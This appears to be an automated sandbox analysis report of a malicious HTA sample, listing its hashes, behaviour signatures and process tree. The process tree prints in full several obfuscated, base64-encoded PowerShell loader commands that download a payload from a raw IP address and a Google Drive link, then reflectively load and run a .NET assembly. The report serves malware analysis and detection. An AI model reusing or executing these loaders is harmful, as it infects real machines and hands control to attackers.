Analysis
-
max time kernel
94s -
max time network
100s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
07/11/2024, 02:51
Static task
static1
Behavioral task
behavioral1
Sample
9af40d7dbe70e708bc2fc5cdf500f7f5389210ed8813f006ac342d6983dcd2ac.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
9af40d7dbe70e708bc2fc5cdf500f7f5389210ed8813f006ac342d6983dcd2ac.hta
Resource
win10v2004-20241007-en
General
-
Target
9af40d7dbe70e708bc2fc5cdf500f7f5389210ed8813f006ac342d6983dcd2ac.hta
-
Size
206KB
-
MD5
1d7fd9405d04f45b7623ceea3602ac1a
-
SHA1
20d6bad0c83ace824ca2c962b9a16f6b2ff0afbb
-
SHA256
9af40d7dbe70e708bc2fc5cdf500f7f5389210ed8813f006ac342d6983dcd2ac
-
SHA512
c5ef145291e6a971497ccc1225b7ad369ea798164acdfdd03a1760cd5c435868feef43727df870cf3cb8e7d40c1046f7ae6aad0a825328148553aaa517936161
-
SSDEEP
48:4FhWsTR/F7gNqXfjH3BrGi3JX3Brmi3Jl7uW2ZxzBKI72VVVrsBAte0oNz3Brs3K:43F97ftlvFHGxtl2VfrJ4a+pM/Q
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 1508 powerSHeLL.exE 6 1992 powershell.exe 8 1992 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2588 powershell.exe 1992 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 1508 powerSHeLL.exE 2060 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powerSHeLL.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1508 powerSHeLL.exE 2060 powershell.exe 1508 powerSHeLL.exE 1508 powerSHeLL.exE 2588 powershell.exe 1992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1508 powerSHeLL.exE Token: SeDebugPrivilege 2060 powershell.exe Token: SeDebugPrivilege 2588 powershell.exe Token: SeDebugPrivilege 1992 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1088 wrote to memory of 1508 1088 mshta.exe 29 PID 1088 wrote to memory of 1508 1088 mshta.exe 29 PID 1088 wrote to memory of 1508 1088 mshta.exe 29 PID 1088 wrote to memory of 1508 1088 mshta.exe 29 PID 1508 wrote to memory of 2060 1508 powerSHeLL.exE 31 PID 1508 wrote to memory of 2060 1508 powerSHeLL.exE 31 PID 1508 wrote to memory of 2060 1508 powerSHeLL.exE 31 PID 1508 wrote to memory of 2060 1508 powerSHeLL.exE 31 PID 1508 wrote to memory of 2116 1508 powerSHeLL.exE 32 PID 1508 wrote to memory of 2116 1508 powerSHeLL.exE 32 PID 1508 wrote to memory of 2116 1508 powerSHeLL.exE 32 PID 1508 wrote to memory of 2116 1508 powerSHeLL.exE 32 PID 2116 wrote to memory of 2776 2116 csc.exe 33 PID 2116 wrote to memory of 2776 2116 csc.exe 33 PID 2116 wrote to memory of 2776 2116 csc.exe 33 PID 2116 wrote to memory of 2776 2116 csc.exe 33 PID 1508 wrote to memory of 2440 1508 powerSHeLL.exE 35 PID 1508 wrote to memory of 2440 1508 powerSHeLL.exE 35 PID 1508 wrote to memory of 2440 1508 powerSHeLL.exE 35 PID 1508 wrote to memory of 2440 1508 powerSHeLL.exE 35 PID 2440 wrote to memory of 2588 2440 WScript.exe 36 PID 2440 wrote to memory of 2588 2440 WScript.exe 36 PID 2440 wrote to memory of 2588 2440 WScript.exe 36 PID 2440 wrote to memory of 2588 2440 WScript.exe 36 PID 2588 wrote to memory of 1992 2588 powershell.exe 38 PID 2588 wrote to memory of 1992 2588 powershell.exe 38 PID 2588 wrote to memory of 1992 2588 powershell.exe 38 PID 2588 wrote to memory of 1992 2588 powershell.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9af40d7dbe70e708bc2fc5cdf500f7f5389210ed8813f006ac342d6983dcd2ac.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\wInDOwSPOwErShelL\V1.0\powerSHeLL.exE"C:\Windows\sYStEm32\wInDOwSPOwErShelL\V1.0\powerSHeLL.exE" "PoWERSHell -EX BYpAsS -noP -W 1 -C dEvICEcREdEntIALDEPlOymENT.Exe ; ieX($(iEx('[sYstEM.TEXt.ENCODinG]'+[ChaR]58+[cHaR]0x3A+'utF8.gETstRINg([sYStEM.CONveRt]'+[ChAR]58+[chaR]0X3A+'FRombasE64STRinG('+[CHaR]0x22+'JGhDNjJTM1FsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUmRFRmluaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJtQyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1RkVaaWlGZ3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1JWQWJPZWpOQ2YsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpkd1l5UyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInd0ekR6WCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb29aTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaEM2MlMzUWw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEzNS4xNjYvMzQvc2VlYWdvb2RwaWN0dXJld2l0aGdyZWF0dGhpZ25zd2l0aG1lZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlYWdvb2RwaWN0dXJld2l0aGdyZWF0dGhpZ25zd2l0aG1lLnZicyIsMCwwKTtTdGFSVC1TTGVFUCgzKTtzdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcc2VlYWdvb2RwaWN0dXJld2l0aGdyZWF0dGhpZ25zd2l0aG1lLnZicyI='+[cHAR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpAsS -noP -W 1 -C dEvICEcREdEntIALDEPlOymENT.Exe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\p8lgdhn6.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D54.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D53.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2776
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seeagoodpicturewithgreatthignswithme.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBzSG9NZVsyMV0rJHBzSG9NRVszMF0rJ3gnKSggKCdyRXBpbWFnZVVybCA9IEk3amh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9lJysneHBvcnQ9ZG93bmxvYWQmaWQ9MVV5SHEnKyd3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIEk3ajtyRXB3ZWInKydDbGllbnQgPSBOZXctT2JqZWMnKyd0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50O3JFJysncGltYWdlQnknKyd0ZXMgPSByRXB3ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHJFcGltYWdlVXJsKTtyRXBpbWFnZVRleHQgPSBbJysnU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhyRXBpbWFnZScrJ0J5dGVzKTtyRXBzdGFydEZsYWcgPSBJN2o8PEJBU0U2NF9TVEFSVD4+STdqO3JFcGVuZEZsYWcgPSBJN2o8PEJBU0U2NF9FTkQ+Pkk3ajtyJysnRXBzdGFydEluZGV4ID0gckVwaW1hZ2VUZXh0LkluZGV4TycrJ2YockVwc3RhcnRGbGFnJysnKTtyRXBlbmRJbmRleCA9JysnICcrJ3JFcGltYWdlVGV4dC5JbmRleE9mKHJFcGVuZEZsYWcpO3JFcHN0YXJ0SW5kZXggLWdlIDAgLWFuZCByRXBlbmRJbmRleCAnKyctZ3QgckVwc3RhcnRJbmRleDtyRXBzJysndGFydEluZGV4ICs9IHJFcHN0YXJ0RmxhZy5MZW5ndGg7ckVwYicrJ2FzZTY0TGVuZ3RoID0gckVwZW5kSW5kZXggLSByRXBzdGFydEluZGV4O3JFcGJhc2U2NENvbW0nKydhbmQgPSByRXBpbWFnZVRleHQuU3Vic3RyaW5nKHJFcHN0YXJ0SW5kZXgsIHJFcGJhc2U2NExlbmd0aCk7ckVwYmFzZTY0UmV2ZXJzZWQgJysnPSAtam9pbiAocicrJ0VwYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIDRycCBGb3JFYWNoLU9iamVjdCB7IHJFcF8gfSlbLTEuLi0ockVwYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtyRXBjb21tYW5kQnl0ZScrJ3MgPSBbU3lzdGVtLkNvbnZlcnRdOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHJFcGJhc2U2NFJldmVyJysnc2VkKTtyRXBsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjJysndGlvJysnbi5Bc3NlbWJseV06OkxvYWQockVwY29tbWFuZEJ5dGVzKTtyRXB2YScrJ2lNZXRobycrJ2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0JysnTWUnKyd0aG8nKydkKEk3alZBSUknKyc3aik7ckVwdmFpTWV0aG9kLkludm9rZScrJyhyRXBudWxsLCBAKEk3anR4dC5SUkZDUkRMLzQzLzY2MS41MzEuNTQyLjI3MS8vOicrJ3B0dGhJN2osIEk3amRlc2F0aXZhZG9JN2osIEk3amRlc2F0aXZhZG9JN2osIEk3amRlc2EnKyd0aXZhZG9JN2osIEk3amFzcG5ldF9jb21waWxlckk3aiwgSTdqZGVzYXRpdmFkb0k3aiwgSTdqZGUnKydzYXRpdmFkb0k3aixJN2pkZXNhdGl2YWRvSTdqLEk3amRlc2F0aXZhZG9JN2osSTdqZGVzYXRpdmFkb0knKyc3aixJN2pkZXNhdGl2YWRvSTdqLEk3amRlc2F0aXZhZG9JN2osSTdqMUk3aixJN2pkZXNhdGl2YWRvSTdqKSk7JykuUkVQbGFDRSgoW0NIQVJdNTIrW0NIQVJdMTE0K1tDSEFSXTExMiksJ3wnKS5SRVBsYUNFKCdyRXAnLCckJykuUkVQbGFDRSgoW0NIQVJdNzMrW0NIQVJdNTUrW0NIQVJdMTA2KSxbc3RSaW5nXVtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $psHoMe[21]+$psHoME[30]+'x')( ('rEpimageUrl = I7jhttps://drive.google.com/uc?e'+'xport=download&id=1UyHq'+'wrnXClKBJ3j63Ll1t2StVgGxbSt0 I7j;rEpweb'+'Client = New-Objec'+'t System.Net'+'.WebClient;rE'+'pimageBy'+'tes = rEpwebClient'+'.DownloadData(rEpimageUrl);rEpimageText = ['+'System.Text.Encoding]::UTF8.GetString(rEpimage'+'Bytes);rEpstartFlag = I7j<<BASE64_START>>I7j;rEpendFlag = I7j<<BASE64_END>>I7j;r'+'EpstartIndex = rEpimageText.IndexO'+'f(rEpstartFlag'+');rEpendIndex ='+' '+'rEpimageText.IndexOf(rEpendFlag);rEpstartIndex -ge 0 -and rEpendIndex '+'-gt rEpstartIndex;rEps'+'tartIndex += rEpstartFlag.Length;rEpb'+'ase64Length = rEpendIndex - rEpstartIndex;rEpbase64Comm'+'and = rEpimageText.Substring(rEpstartIndex, rEpbase64Length);rEpbase64Reversed '+'= -join (r'+'Epbase64Command.ToCharArray() 4rp ForEach-Object { rEp_ })[-1..-(rEpbase64Command.Length)];rEpcommandByte'+'s = [System.Convert]::'+'FromBa'+'se64String(rEpbase64Rever'+'sed);rEploadedAssembly = [System.Reflec'+'tio'+'n.Assembly]::Load(rEpcommandBytes);rEpva'+'iMetho'+'d = [dnlib.IO.Home].Get'+'Me'+'tho'+'d(I7jVAII'+'7j);rEpvaiMethod.Invoke'+'(rEpnull, @(I7jtxt.RRFCRDL/43/661.531.542.271//:'+'ptthI7j, I7jdesativadoI7j, I7jdesativadoI7j, I7jdesa'+'tivadoI7j, I7jaspnet_compilerI7j, I7jdesativadoI7j, I7jde'+'sativadoI7j,I7jdesativadoI7j,I7jdesativadoI7j,I7jdesativadoI'+'7j,I7jdesativadoI7j,I7jdesativadoI7j,I7j1I7j,I7jdesativadoI7j));').REPlaCE(([CHAR]52+[CHAR]114+[CHAR]112),'|').REPlaCE('rEp','$').REPlaCE(([CHAR]73+[CHAR]55+[CHAR]106),[stRing][CHAR]39))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53ba8db42f99584bb73ee9cfa0548cb02
SHA1713b1d9109e787341b03d44f7515743e212ecc0e
SHA25620057f7b88f7dc90e2b6c82f6e73c067ca4fee9ba693038c34d0044322a7f6b2
SHA51284c7afcef5dfc7a74310e6b8fec0970bdc4df5067fc74523a3db3169453b267b3f87d38523db3b001df83cc54ff1c0f749fdfc8bafb8219c268632b5530b7409
-
Filesize
3KB
MD53b4dbcd9a2df69c881b45856e3a501f0
SHA14a3b91ae73f3b23e4807658e471c9f6432b12929
SHA2563d771bcfa99cb24ac8adbd36f7a837498709e9c030fc9d8729804ea22b58574e
SHA5125c48f635bd060a3d33e614b961b012610748e0caec71123e86dca646758e9d8db84549e51ee3efa6409b28863aee8f16e3150f2ebdb437a17e6b7efa7d1af6c6
-
Filesize
7KB
MD56b32fa4ac45556f0550cadf2d7c74911
SHA1a0a460b9fd2603a18542a7cd05b606013f06b13d
SHA25646edc1fb1b8cacbe736b1084dc5bbe5297f7a132641e0123dc2731fb20b2124f
SHA512cc82f0ee75f8cbb1fa4d1fdcbee0956b1d4df7581f39d3b32ebf60b47004c7aacb3c8478f7e4eb508b9f2e5b550ef0cd317b091b581263af7a3c964d000c4c60
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD52e2bbc2e9b8d9910b127aeefee767e2a
SHA181e3bd6b9e9348fa274e1ac2bb511c44d896c139
SHA25624f761f4598ae2933d443733ce2878f358a00b2da8035dbd66cec8f6ee7b84a0
SHA512433a40274cf1562be273dbee1ed364c77856f49ec45df1d1dfabb158bf05a713ced9c47c4c6ace4eb715ba0fbe9b6c8724e34bf7409cb400da9deebe14232013
-
Filesize
138KB
MD575c04757cc9d62cacb38fb15e5b49cca
SHA1ac2c54c2dc6ae1b8355fa44ba98a1ba03675d14c
SHA2567913be4378af7f7413b74feae0a7c3c63c1d9ca9ad8f5ceb0361feb5a019238f
SHA512d3717706110dc781462e76e33fc1adec6cbdf8f589735f90a71bdf37ca55b64cf45e46430e08e941cfe0233c4147232ac6631fe66da2642ca5eef3cd173deaf4
-
Filesize
652B
MD56110a520a5d57f979740c99aae09a369
SHA1489ecdaaaf50e2ad83e86b7e467118e1f24576ea
SHA25653534b1515f5746959d6db055950f98fbf9da49989e71cb356011435c9c0b4c8
SHA512ff1a50148f66dfc81812bcb757f57a047003bb072fee94aedec492399852a8015bc10e88a0d5bb4265e3e1c7a938297783b40c6b847dfc017130dc161548f3f2
-
Filesize
478B
MD5ada4c67587bb2ea7318e1cb59626f064
SHA1f479ee06a28583f07107c310848f266b3ffc85f5
SHA256f6d41138084df8aedcf8852b9f0082cb6fc228c04cd56ed5f0f97bc4141b9029
SHA51259524799edbfcdab013e910273a991dc99d7c7f0283955b50dba1712ad59172299d99187bd0e708b5433eeb34742573bdcbdd41eb5af49d276f0fe5c87810bc8
-
Filesize
309B
MD59148568a5b46b00e6785cf7db45de51d
SHA11a70379c5c65eecf155b3b181f509135419dcb85
SHA256e4e6dd80bdcae05c0cbd3cbb0299b84885f246cdf6e453de8516d7c4e6e724ce
SHA512d426a57016a9d2442e6ee8e57b74fb1b6733346157858b5770419ed1a9896d741f814ae7763535a0c7172936b04219e2b39de7fadef29179e0c72f92edc60b2d